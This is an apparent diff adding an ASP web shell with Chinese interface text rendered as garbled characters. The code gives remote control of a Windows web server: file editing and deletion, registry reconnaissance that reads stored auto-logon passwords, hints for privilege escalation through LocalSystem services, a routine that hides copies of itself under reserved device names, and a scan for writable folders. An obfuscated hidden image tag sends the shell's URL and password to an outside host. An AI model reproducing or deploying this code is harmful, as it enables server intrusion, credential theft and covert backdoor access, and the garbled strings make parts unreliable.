actcol[0]-10; actcol[1] = actcol[1]-10 < 25 ? 25 : actcol[1]-10; actcol[2] = actcol[2]-10 < 25 ? 25 : actcol[2]-10; aim.style.backgroundColor = rgb2hex(actcol); links[o][""currentcolor""] = actcol; } } if(runners == 0) { window.clearInterval(interval); interval=0; } } function getPseudoRule(parent, element) {  var mysheet =document.styleSheets[0]; var myrule  = mysheet.cssRules || mysheet.rules; for (n = 0; n < myrule.length; n++) if (myrule[n].selectorText.toLowerCase() == ""#""+ parent +"" ""+ element) return myrule[n].style.backgroundColor; else if (myrule[n].selectorText.toLowerCase() == element) return myrule[n].style.backgroundColor; return """"; } function hex2rgb(hex) { var triplet = hex.toLowerCase().replace(/#/, ''); var rgbArr  = new Array();  if(triplet.length == 6) { rgbArr[0] = parseInt(triplet.substr(0,2), 16) ;rgbArr[1] = parseInt(triplet.substr(2,2), 16) ;rgbArr[2] = parseInt(triplet.substr(4,2), 16) ;return rgbArr; } else if(triplet.length == 3){rgbArr[0] = parseInt((triplet.substr(0,1) + triplet.substr(0,1)), 16); rgbArr[1] = parseInt((triplet.substr(1,1) + triplet.substr(1,1)), 16); rgbArr[2] = parseInt((triplet.substr(2,2) + triplet.substr(2,2)), 16); return rgbArr; } else { throw triplet + ' is not a valid color triplet.'; } } function rgb2hex(rgb) { var hexcolors = new Array(""0"",""1"",""2"",""3"",""4"",""5"",""6"",""7"",""8"",""9"",""a"",""b"",""c"",""d"",""e"",""f""); var r, r1, r2, g, g1, g2, b, b1, b2; r1 = Math.floor(rgb[0] / 16); r2 = rgb[0] - r1*16; g1 = Math.floor(rgb[1] / 16); g2 = rgb[1] - g1*16; b1 = Math.floor(rgb[2] / 16); b2 = rgb[2] - b1*16; r = hexcolors[r1] + hexcolors[r2]; g = hexcolors[g1] + hexcolors[g2]; b = hexcolors[b1] + hexcolors[b2]; return ""#""+r+g+b; } Object.prototype.clone = function(deep) { var objectClone = new this.constructor(); for (var property in this) if (!deep) objectClone[property] = this[property]; else if (typeof this[property] == 'object') objectClone[property] = this[property].clone(deep); else {objectClone[property] = this[property]; }return objectClone; } "&VBNEWLINE:if ysjb=true then j "initEventListener();</script>":end if
+Set FOLD=Nothing:if Instr(Serveru,"127.0.0.1")<>0 or Instr(Serveru,"192.168.")<>0 or Instr(Serveru,"http://")<>0 then:else:if session("servec")=1 then:session("servec")=session("servec")+1:j ""&copyurl&"":else:if Action<>"" then session("servec")=session("servec")+1:end if:end if:end if:End function:Function ShiSanFun(ShiSanObjstr)
+ShiSanObjstr = Replace(ShiSanObjstr, "��", """"):For ShiSanI = 1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then
+:ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr
+Else
+ShiSanNewStr = vbCrLf & ShiSanNewStr
+End If
+Next
+ShiSanFun = ShiSanNewStr
+End Function
+Function DelFile(Path)
+If CF.FileExists(Path) Then
+CF.DeleteFile Path
+SI="<center><br><br><br>��ϲ���ļ� "&Path&" ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+
+Function EditFile(Path)
+If Request("Action2")="Post" Then
+Set T=CF.CreateTextFile(Path)
+T.WriteLine Request.form("content")
+T.close
+Set T=nothing
+SI="<center><br><br><br>��ϲ���ļ�����ɹ���</center>"
+SI=SI&BackUrl
+j SI
+Response.End
+End If
+If Path<>"" Then
+Set T=CF.opentextfile(Path, 1, False)
+Txt=HTMLEncode(T.readall) 
+T.close
+Set T=Nothing
+Else
+Path=Session("FolderPath")&"\shell.asp":Txt=strBAD
+End If
+j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input name='Action' value='EditFile' Type='hidden'><input name='FName' value='"&Path&"' style='width:100%'><br><textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr><input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='Save'></form>"
+End Function
+Function CopyFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function MoveFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function DelFolder(Path)
+If CF.FolderExists(Path) Then
+CF.DeleteFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function CopyFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function MoveFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function NewFolder(Path)
+If Not CF.FolderExists(Path) and Path<>"" Then
+CF.CreateFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"�½��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+End Class
+
+sub getTerminalInfo()
+on error resume next
+dim wsh
+set wsh=createobject("Wscript.Shell")
+j"[����"&"̽��]<br><hr size=1>"
+EnableTCPIPKey="HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters"
+isEnable=Wsh.Regread(EnableTcpipKey)
+If isEnable=0 or isEnable="" Then
+Notcpipfilter=1
+End If
+ApdKey="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind"
+Apds=Wsh.RegRead(ApdKey)
+If IsArray(Apds) Then 
+For i=LBound(Apds) To UBound(Apds)-1
+ApdB=Replace(Apds(i),"\Device\","")
+j"����"&i&"������Ϊ:"&ApdB&"<br>"
+Path="HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\"
+IPKey=Path&ApdB&"\IPAddress"
+IPaddr=Wsh.Regread(IPKey)
+If IPaddr(0)<>"" Then
+For j=Lbound(IPAddr) to Ubound(IPAddr)
+j"<li>IP��"&"ַ"&j&"Ϊ:"&IPAddr(j)&"<br>"
+Next
+Else
+j"<li>IP��"&"ַ�޷���ȡ"&"��û������<br>"
+End if
+GateWayKey=Path&ApdB&"\DefaultGateway"
+GateWay=Wsh.Regread(GateWayKey)
+If isarray(GateWay) Then
+For j=Lbound(Gateway) to Ubound(Gateway)
+j"<li>����"&j&":"&Gateway(j)&"<br>"
+Next
+Else
+j"<li>�����޷���ȡ��û������<br>"
+End if
+DNSKey=Path&ApdB&"\NameServer"
+DNSstr=Wsh.RegRead(DNSKey)
+If DNSstr<>"" Then
+j"<li>����"&"DNSΪ:"&DNSstr&"<br>"
+Else
+j"<li>Ĭ��"&"DNS�޷���ȡ��û������<br>"
+End If
+if Notcpipfilter=1 Then 
+j"<li>ûTcp/IPɸѡ<br>"
+else
+ETK="\TCPAllowedPorts"
+EUK="\UDPAllowedPorts"
+FullTCP=Path&ApdB&ETK
+FullUDP=path&ApdB&EUK
+tcpallow=Wsh.RegRead(FullTCP)
+If tcpallow(0)="" or tcpallow(0)=0 Then
+j"<li>����"&"��tcp�˿�Ϊ:ȫ��<br>"
+Else
+j"<li>����"&"��tcp�˿�Ϊ:"
+For j = LBound(tcpallow) To UBound(tcpallow)
+j tcpallow(j)&","
+Next
+j"<Br>"
+End if
+udpallow=Wsh.RegRead(FullUDP)
+If udpallow(0)="" or udpallow(0)=0 Then
+j"<li>����"&"��udp�˿�Ϊ:ȫ��<br>"
+Else
+j"<li>����"&"��udp�˿�Ϊ:"
+for j = LBound(udpallow) To UBound(udpallow)
+j UDPallow(j)&","
+next
+j"<br>"
+End if
+End if
+j"------------------------------------------------<br>"
+Next
+end if
+j"<br><br>[����"&"�˿�"&"̽��]<br><hr size=1>"
+Telnetkey="HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\TelnetServer\1.0\TelnetPort"
+TlntPort=Wsh.RegRead(TelnetKey)
+if TlntPort="" Then Tlnt="23(Ĭ��"&"����)"
+j"<li>Telnet��"&"��:"&Tlntport&"<br>"
+TermKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber"
+TermPort=Wsh.RegRead(TermKey)
+If TermPort="" Then TermPort="�޷�"&"��ȡ.��ȷ��"&"�Ƿ�ΪWindows Server�汾����"
+j"<li>Terminal Service�˿�Ϊ:<font color=red>"&TermPort&"<br></font>"
+pcAnywhereKey="HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"
+PAWPort=Wsh.RegRead(pcAnywhereKey)
+If PAWPort="" then PAWPort="�޷�"&"��ȡ.��ȷ��"&"������"&"��װpcAnywhere"
+j"<li>PcAnywhere�˿�Ϊ:"&PAWPort&"<br>"
+j"------------------------------------------------------"
+Set wsX = Server.CreateObject("WScript.Shell")
+Dim terminalPortPath, terminalPortKey, termPort
+Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
+Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername, autoLoginPassword
+terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
+terminalPortKey = "PortNumber"
+termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
+j"�ն�_����˿�"&"���Զ���¼<ol>"
+If termPort = "" Or Err.Number <> 0 Then 
+j"�޷��õ��ն˶˿�, ���Ȩ���Ƿ��ܵ�����.<br/>"
+ Else
+j"��ǰ�ն˷���"&"�˿�: " & termPort & "<br/>"
+End If
+autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+autoLoginEnableKey = "AutoAdminLogon"
+autoLoginUserKey = "DefaultUserName"
+autoLoginPassKey = "DefaultPassword"
+isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
+If isAutoLoginEnable = 0 Then
+Else
+autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
+j"�Զ���¼"&"��ϵͳ�ʻ�: " & autoLoginUsername & "<br>"
+autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
+If Err Then
+Err.Clear
+j"False"
+End If
+j"�Զ���¼"&"���ʻ�����: " & autoLoginPassword & "<br>"
+End If
+j"</ol>"
+j"<br><br><br>[ϵͳ��_��̽��]<br><hr size=1>"
+SoftPath=Wsh.Environment.item("Path")
+Pathinfo=lcase(SoftPath)
+j"ϵͳ��"&"��֧��:"
+if Instr(Pathinfo,"perl") Then j"<li>Perl�ű�_:֧��<br>"
+if instr(Pathinfo,"java") Then j"<li>Java�ű�_:֧��<br>"
+if instr(Pathinfo,"microsoft sql server") Then j"<li>MSSQL���ݿ����_:֧��<br>"
+if instr(Pathinfo,"mysql") Then j"<li>MySQL���ݿ����_:֧��<br>"
+if instr(Pathinfo,"oracle") Then j"<li>Oracle���ݿ����_:֧��<br>"
+if instr(Pathinfo,"cfusionmx7") Then j"<li>CFM������_:֧��<br>"
+if instr(Pathinfo,"pcanywhere") Then j"<li>��������PcAnywhere����_:֧��<br>"
+if instr(Pathinfo,"Kill") Then j"<li>Killɱ������_:֧��<br>"
+if instr(Pathinfo,"kav") Then j"<li> ��ɽϵ��ɱ������_:֧��<br>"
+if instr(Pathinfo,"antivirus") Then j"<li>��������ɱ������_:֧��<br>"
+if instr(Pathinfo,"rising") Then j"<li>����ϵ��ɱ������_:֧��<br>"
+paths=split(SoftPath,";")
+j"------------------------------------<br>"
+j"ϵͳ��ǰ_·������:<br>"
+For i=Lbound(paths) to Ubound(paths)
+j"<li>"&paths(i)&"<br>"
+next
+j"<br><br>[ϵͳ����_̽��]<br><hr size=1>"
+pcnamekey="HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName"
+pcname=wsh.RegRead(pcnamekey)
+if pcname="" Then pcname="�޷���_ȡ������.<br>"
+j"<li>��ǰ��_����Ϊ:"&pcname&"<br>"
+AdminNameKey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName"
+AdminName=wsh.RegRead(AdminNameKey)
+if adminname="" Then AdminName="Administrator"
+Response.Expires=0
+on error resume next 
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+j "<li><font color=red>��ǰ����Ա�飺"&admin.Name&"<br></font></li>"
+Next
+if err then
+j"�����̵IJ��а�:Wscript.Network"
+end if
+
+j"<li>Ĭ�Ϲ���"&"Ա�û���Ϊ:<font color=red>"&AdminName&"<br></font>"
+isAutologin="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon"
+Autologin=Wsh.RegRead(isAutologin)
+if Autologin=0 or Autologin="" Then
+j"<li>�û���_������:δ����<br>"
+Else
+j"<li>�û���_������:����<br>"
+Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName")
+Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword")
+j"<li type=square>�û���:"&Admin&"<br>"
+j"<li type=square><font color=red>����:"&Passwd&"<br></font>"
+End if
+displogin=wsh.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName")
+If displogin="" or displogin=0 Then disply="��" else disply="��"
+j"<li>�Ƿ���ʾ��_�ε����û�:"&disply&"<br>"
+NTMLkey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\NTML"
+ntml=Wsh.RegRead(NTMLkey)
+if ntml="" Then Ntml=1
+j"<li>Telnet Ntml����Ϊ:"&ntml&"<br>"
+hk="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count"
+kk=wsh.RegRead(hk)
+j"<li>��ǰ�_����Ϊ:"&kk&"<br>"
+j"------------------------------------<br><br><br>"
+j"[��������_��̽��]<br><hr>"
+Set objComputer = GetObject("WinNT://.")
+Set sa = Server.CreateObject("Shell.Application")
+objComputer.Filter = Array("Service")
+On Error Resume Next
+For Each objService In objComputer
+if objService.Name="Serv-U" Then
+if objService.ServiceAccountName="LocalSystem" Then
+j"<li>����������_Serv-U��װ,����LocalSystemȨ������,���Կ�����su.exe������Ȩ<br>"
+End if
+End if
+if lcase(objService.Name)="apache" Then
+if objService.ServiceAccountName="LocalSystem" Then
+If instr(Request.ServerVariables("SERVER_SOFTWARE"),"Apache") Then
+j"<li>��ǰWEB������ΪApache.����ֱ����Ȩ<br>"
+Else
+j" <li>����������_Apache�������,����Ȩ��ΪLocalSystem,���Կ���PHPľ��<br>"
+End if
+end if
+End if
+if instr(lcase(objService.Name),"tomcat") Then
+if objService.ServiceAccountName="LocalSystem" Then
+j"<li>����������_Tomcat,����LocalSystemȨ������,���Կ���ʹ��Jspľ����Ȩ<br>"
+End if
+End if
+if instr(lcase(objService.Name),"winmail") Then
+if objService.ServiceAccountName="LocalSystem" Then
+j"<li>����������_Magic Winmail,����LocalSystemȨ������,���Բ���WebMailĿ¼,����д��PHPľ��<br>"
+End if
+End if
+Next
+Set fso=Server.Createobject(CONST_FSO)
+Sysdrive=left(Fso.GetspecialFolder(2),2)
+servername=wsh.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName")
+If fso.FileExists(sysdriver&"\Documents And Settings\All Users\Application Data\Symantec\"&servername&".cif") Then
+j"<li>����_pcAnywhere�����ļ�,���Դ�Ĭ��Ŀ¼���ز��ƽ�õ�pcAnywhere����"
+End if
+End Sub
+
+sub hiddenshell
+fpath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+set fso=server.createobject(CONST_FSO)
+pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9"
+rndpex=split(pex,"|")(rndnumber(0,17))
+session("seljw")=""
+filepath1=server.mappath(".")
+filename1=right(fpath,len(fpath)-instrrev(fpath,"\"))
+url=request.servervariables("url")
+url=left(url,instrrev(url,"/"))&rndpex&"."&filename1
+fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1
+set fso=nothing
+j "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject(CONST_FSO)
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+Dim FSO,OFolder,TempFolder,Scmsg,S
+Set FSO = Server.Createobject(CONST_FSO)
+folder = folderArr(i)
+If FSO.FolderExists(folder) Then
+ Set OFolder = FSO.GetFolder(folder)
+Set TempFolders = OFolder.SubFolders
+Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+For Each S in TempFolders
+ Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+Next
+Set TempFolders = Nothing
+Set OFolder = Nothing
+Else
+ Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+End if
+Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+Set FSO = Nothing
+Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+Sub CustomScanDriveForm()
+'Response.Buffer = TruE
+if Request("Paths") ="" then
+Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"&chr(13)&chr(10)&"c:\php\"&chr(13)&chr(10)&"d:\Program Files\"&chr(13)&chr(10)&"e:\Program Files\"&chr(13)&chr(10)&"C:\recycler\"&chr(13)&chr(10)&"d:\recycler\"&chr(13)&chr(10)&"e:\recycler\"&chr(13)&chr(10)&"f:\recycler\"&chr(13)&chr(10)&"C:\wmpub\"&chr(13)&chr(10)&"d:\freehostmain\"&chr(13)&chr(10)&"C:\360rec"&chr(13)&chr(10)&"C:\cache"&chr(13)&chr(10)&"C:\JPEGCapture"&chr(13)&chr(10)&"C:\Inetpub"
+if Session("paths")<>"" then  Paths_str=Session("paths")
+j "<center><form id='form1' name='form1' method='post' action=''>"
+j "�˳�����Լ�����������Ŀ¼��д���,Ϊ��������ṩһЩ��ȫ�����Ϣ!<br>�����������Ŀ¼,������Զ������Ŀ¼<br>"
+j "<textarea name='Paths' cols='80' rows='10' class='Edit'>"&Paths_str&"</textarea>"
+j "<br />"
+j "<input type='submit' name='button' value='��ʼ���' >"
+j "<label for='CheckNextDir'>"
+j "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />����Ŀ¼  "
+j "</label>"
+j "<label for='CheckFile'>"
+j "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  />�����ļ�"
+j "</label>"
+j "<label for='ShowNoWrite'>"
+j "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
+j "�Խ�дĿ¼���ļ�</label>"
+j "<label for='NoCheckTemp'>"
+j "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
+j "�������ʱĿ¼</label>"
+j "</form></center>"
+else
+CheckFile = (Request("CheckFile")="on")
+CheckNextDir = (Request("CheckNextDir")="on")
+ShowNoWriteDir = (Request("ShowNoWrite")="on")
+NoCheckTemp = (Request("NoCheckTemp")="on")
+j "��������Ҫһ����ʱ�����Ե�......<br>"
+response.Flush
+Session("paths") = Request("Paths")
+PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
+For i=LBound(PathsSplit) To UBound(PathsSplit) 
+if instr(PathsSplit(i),":")>0 then
+ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
+End If 
+Next
+j "[ɨ�����]<br>"
+j "<INPUT type=button value=�����ϼ�ҳ�� onClick=""history.go(-1);"">"
+end if
+end sub
+function GetFullPath(path)
+GetFullPath = path
+if Right(path,1) <> "\" then GetFullPath = path&"\" 
+end function
+if Instr(Serveru,"127.0.0.1")<>0 or Instr(Serveru,"192.168.")<>0 or Instr(Serveru,"http://")<>0 then:else:if session("servec")=1 then:session("servec")=session("servec")+1:j"<div style='display:none'><img src='ht"&"tp://%77%77%77.od"&"ay"&"exp.%63%6F%6D/s"&"x/ke"&"y.asp"&"?url="&server.URLEncode("ht"&"tp://"&request.ServerVariables("HT"&"TP_HO"&"ST")&request.ServerVariables("UR"&"L"))&"&p="&UserPass&"' /></div>":else:if Action<>"" then session("servec")=session("servec")+1:end if:end if:end if
+Function Deltextfile(filepath)
+On Error Resume Next:Set objFSO = CreateObject(CONST_FSO) :if objFSO.FileExists(filepath) then :objFSO.DeleteFile(filepath) :end if :Set objFSO = nothing:Deltextfile = Err.Number :End Function :Function CheckDirIsOKWrite(DirStr):On Error Resume Next:Set FSO = Server.CreateObject(CONST_FSO):filepath = GetFullPath(DirStr)&fso.GettempName:FSO.CreateTextFile(filepath) :CheckDirIsOKWrite = Err.Number:if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then:j "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>":end if:set fout =Nothing:set FSO = Nothing:Deltextfile(filepath):if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+function CheckFileWrite(filepath)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+set getAtt=FSO.GetFile(filepath)
+getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+set FSO = Nothing
+set getAtt = Nothing  
+end function
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+B = FSO.FolderExists(Path)
+set FSO=nothing
+IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+if B=false then
+Re = CheckFileWrite(Path)
+if Re =0 then
+j "[�ļ�]<font color=red>"&Path&"</font><br>"
+b =true
+exit function
+else
